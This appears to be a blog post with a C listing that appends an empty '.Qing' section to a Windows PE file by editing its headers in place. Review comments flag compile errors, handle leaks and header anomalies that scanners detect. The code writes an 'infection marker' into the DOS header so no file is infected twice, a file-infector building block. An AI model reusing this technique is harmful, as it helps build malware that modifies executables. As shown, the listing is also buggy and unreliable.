PE增加区段

话说PE增加区段......
//**********************************************
// Method:    AddEmptySection
// Purpose:   Append an empty (no raw data on disk) section named ".Qing" to an
//            existing PE image by editing its headers in place through a
//            read/write file mapping. Only the section table and a handful of
//            IMAGE_NT_HEADERS fields are rewritten; the new section header has
//            SizeOfRawData = 0, so no bytes are appended to the file body.
// Returns:   BOOL  TRUE on success; FALSE when the file cannot be opened or
//            mapped, does not carry the MZ / PE signatures, already carries the
//            19861001 marker in the DOS header, or (as checked here) has no
//            room in the header area for one more IMAGE_SECTION_HEADER.
// Parameter: PCTSTR ptFile  path of the file that receives the empty section
// Parameter: UINT uSize     requested VirtualSize of the new section
//
// NOTE(review): this listing does not compile as shown: `dwSize` (used in the
// CreateFileMapping and MapViewOfFile calls) is never declared, and ZALIGN is
// assumed to be an alignment-rounding macro defined elsewhere -- confirm both.
// NOTE(review): three early `return FALSE` paths (bad DOS magic, bad PE
// signature, no room in the section table) skip UnmapViewOfFile/CloseHandle
// and leak the mapping and file handles; the e_res2 marker is also written
// before the PE signature and section-table checks, so a file that fails
// those later checks is still left modified on disk.
// From a detection standpoint, every edit made below (a non-standard section
// name, a value in a reserved DOS-header field, a section with VirtualSize
// but zero raw size, a SizeOfImage that is no longer SectionAlignment-rounded,
// a zeroed bound-import directory) is a header anomaly that PE-integrity
// checks, Authenticode verification (the header hash no longer matches) and
// static scanners key on.
//**********************************************
BOOL AddEmptySection(PCTSTR ptFile,UINT uSize)
{
    HANDLE hFile = NULL;
    HANDLE hMapping = NULL;
    LPVOID bPointer = NULL;
    PBYTE pData = NULL;

    // Open the source file for read/write (existing file only, shared R/W).
    hFile = CreateFile(
        ptFile,
        GENERIC_READ|GENERIC_WRITE,
        FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_SEQUENTIAL_SCAN,
        NULL);
    if (hFile == INVALID_HANDLE_VALUE)
        return FALSE;

    // Create a read/write file mapping over the file.
    // NOTE(review): `dwSize` is undeclared in this listing (presumably uSize
    // or the file size -- confirm); if it exceeds the file length,
    // CreateFileMapping grows the file to that size.
    if (!(hMapping = CreateFileMapping(hFile, 0, PAGE_READWRITE | SEC_COMMIT, 0, dwSize, NULL)))
    {
        CloseHandle(hFile);
        return FALSE;
    }

    // Map a read/write view so the headers can be edited in place.
    if (!(bPointer = MapViewOfFile(hMapping, FILE_MAP_ALL_ACCESS, 0, 0, dwSize)))
    {
        CloseHandle(hMapping);
        CloseHandle(hFile);
        return FALSE;
    }

    pData = (PBYTE)bPointer;

    // Check the DOS signature ("MZ").
    // NOTE(review): the DOS header is read without checking that the view is
    // at least sizeof(IMAGE_DOS_HEADER) bytes long, and this return neither
    // unmaps the view nor closes hMapping/hFile (leak).
    if (((PIMAGE_DOS_HEADER) pData)->e_magic != IMAGE_DOS_SIGNATURE)
    {
        return FALSE;
    }

    // Check whether the file has already been infected: the first four bytes
    // of the reserved e_res2 field of the DOS header are used as the marker.
    if( *(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) == 19861001)
    { // Already infected: skip this file.
        UnmapViewOfFile(bPointer);
        CloseHandle(hMapping);
        CloseHandle(hFile);
        return FALSE;
    }
    else
    {
        // Set the infection marker so a second pass over the file is a no-op.
        // NOTE(review): this write lands in the mapped file immediately, even
        // if one of the checks below rejects the file afterwards.
        *(DWORD*)(((PIMAGE_DOS_HEADER) pData)->e_res2) = 19861001;
    }

    // Locate IMAGE_NT_HEADERS via e_lfanew and check the "PE\0\0" signature.
    // NOTE(review): e_lfanew is trusted without a bounds check against the
    // view size, so a truncated or crafted file makes this dereference read
    // outside the mapping. The early return below also leaks the view and
    // both handles. (pData and bPointer are the same address; the mixed use
    // is cosmetic.)
    PIMAGE_NT_HEADERS pNTHdr = (PIMAGE_NT_HEADERS) (pData + ((PIMAGE_DOS_HEADER) bPointer)->e_lfanew);
    if (pNTHdr->Signature != IMAGE_NT_SIGNATURE)
        return FALSE;

    // Make sure the header area has room for one more section header.
    // NOTE(review): this compares only the size of the section table with
    // SizeOfHeaders and ignores where the table starts
    // (e_lfanew + sizeof(IMAGE_NT_HEADERS)), so it can accept a file in which
    // the new header overruns the header area. Leaks on return as above.
    if ((pNTHdr->FileHeader.NumberOfSections + 1) * sizeof(IMAGE_SECTION_HEADER) > pNTHdr->OptionalHeader.SizeOfHeaders)
        return FALSE;

    // Round the requested size up to the image's section and file alignments.
    DWORD uCodeDelta = ZALIGN(uSize, pNTHdr->OptionalHeader.SectionAlignment);
    DWORD dwFileDelta = ZALIGN(uSize, pNTHdr->OptionalHeader.FileAlignment);

    // pNewSec = the free slot right after the last existing section header;
    // pLastSec = the current last section, used to place the new one.
    // NOTE(review): (pNTHdr + 1) assumes SizeOfOptionalHeader equals
    // sizeof(IMAGE_OPTIONAL_HEADER); IMAGE_FIRST_SECTION() honours the real
    // value. pLastSec = pNewSec - 1 also assumes NumberOfSections >= 1.
    PIMAGE_SECTION_HEADER pNewSec = (PIMAGE_SECTION_HEADER) (pNTHdr + 1) + pNTHdr->FileHeader.NumberOfSections;
    PIMAGE_SECTION_HEADER pLastSec = pNewSec - 1;

    // Fill in the new section header. Only the fields below are written; the
    // remaining fields keep whatever bytes were already in the header slack
    // (not explicitly zeroed).
    memcpy(pNewSec->Name, ".Qing", 6);
    pNewSec->VirtualAddress = pLastSec->VirtualAddress + ZALIGN(pLastSec->Misc.VirtualSize, pNTHdr->OptionalHeader.SectionAlignment);
    pNewSec->PointerToRawData = pLastSec->PointerToRawData + pLastSec->SizeOfRawData;
    pNewSec->Misc.VirtualSize = uSize;
    pNewSec->SizeOfRawData = 0;//uCodeDelta;  -- no raw data on disk (uninitialized-data style section)
    pNewSec->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE ;// section attributes: R/W data, not flagged as code

    // Update IMAGE_NT_HEADERS for the extra section.
    // NOTE(review): SizeOfImage has to stay a multiple of SectionAlignment, so
    // it should grow by uCodeDelta (section-aligned), yet it is advanced by the
    // file-aligned dwFileDelta here -- the two deltas look swapped. SizeOfCode
    // is also bumped although the section is not IMAGE_SCN_CNT_CODE.
    pNTHdr->FileHeader.NumberOfSections++;
    pNTHdr->OptionalHeader.SizeOfCode += uCodeDelta;
    pNTHdr->OptionalHeader.SizeOfImage += dwFileDelta;
    // pNTHdr->OptionalHeader.AddressOfEntryPoint;//no change here
    // Clear the bound-import directory. Presumably because bound-import data
    // sits in the header area that the new section header can now overlap --
    // confirm.
    pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
    pNTHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;

    UnmapViewOfFile(bPointer); // unmap the view; the edited headers are written back to the file
    CloseHandle(hMapping);
    CloseHandle(hFile);
    return TRUE;
}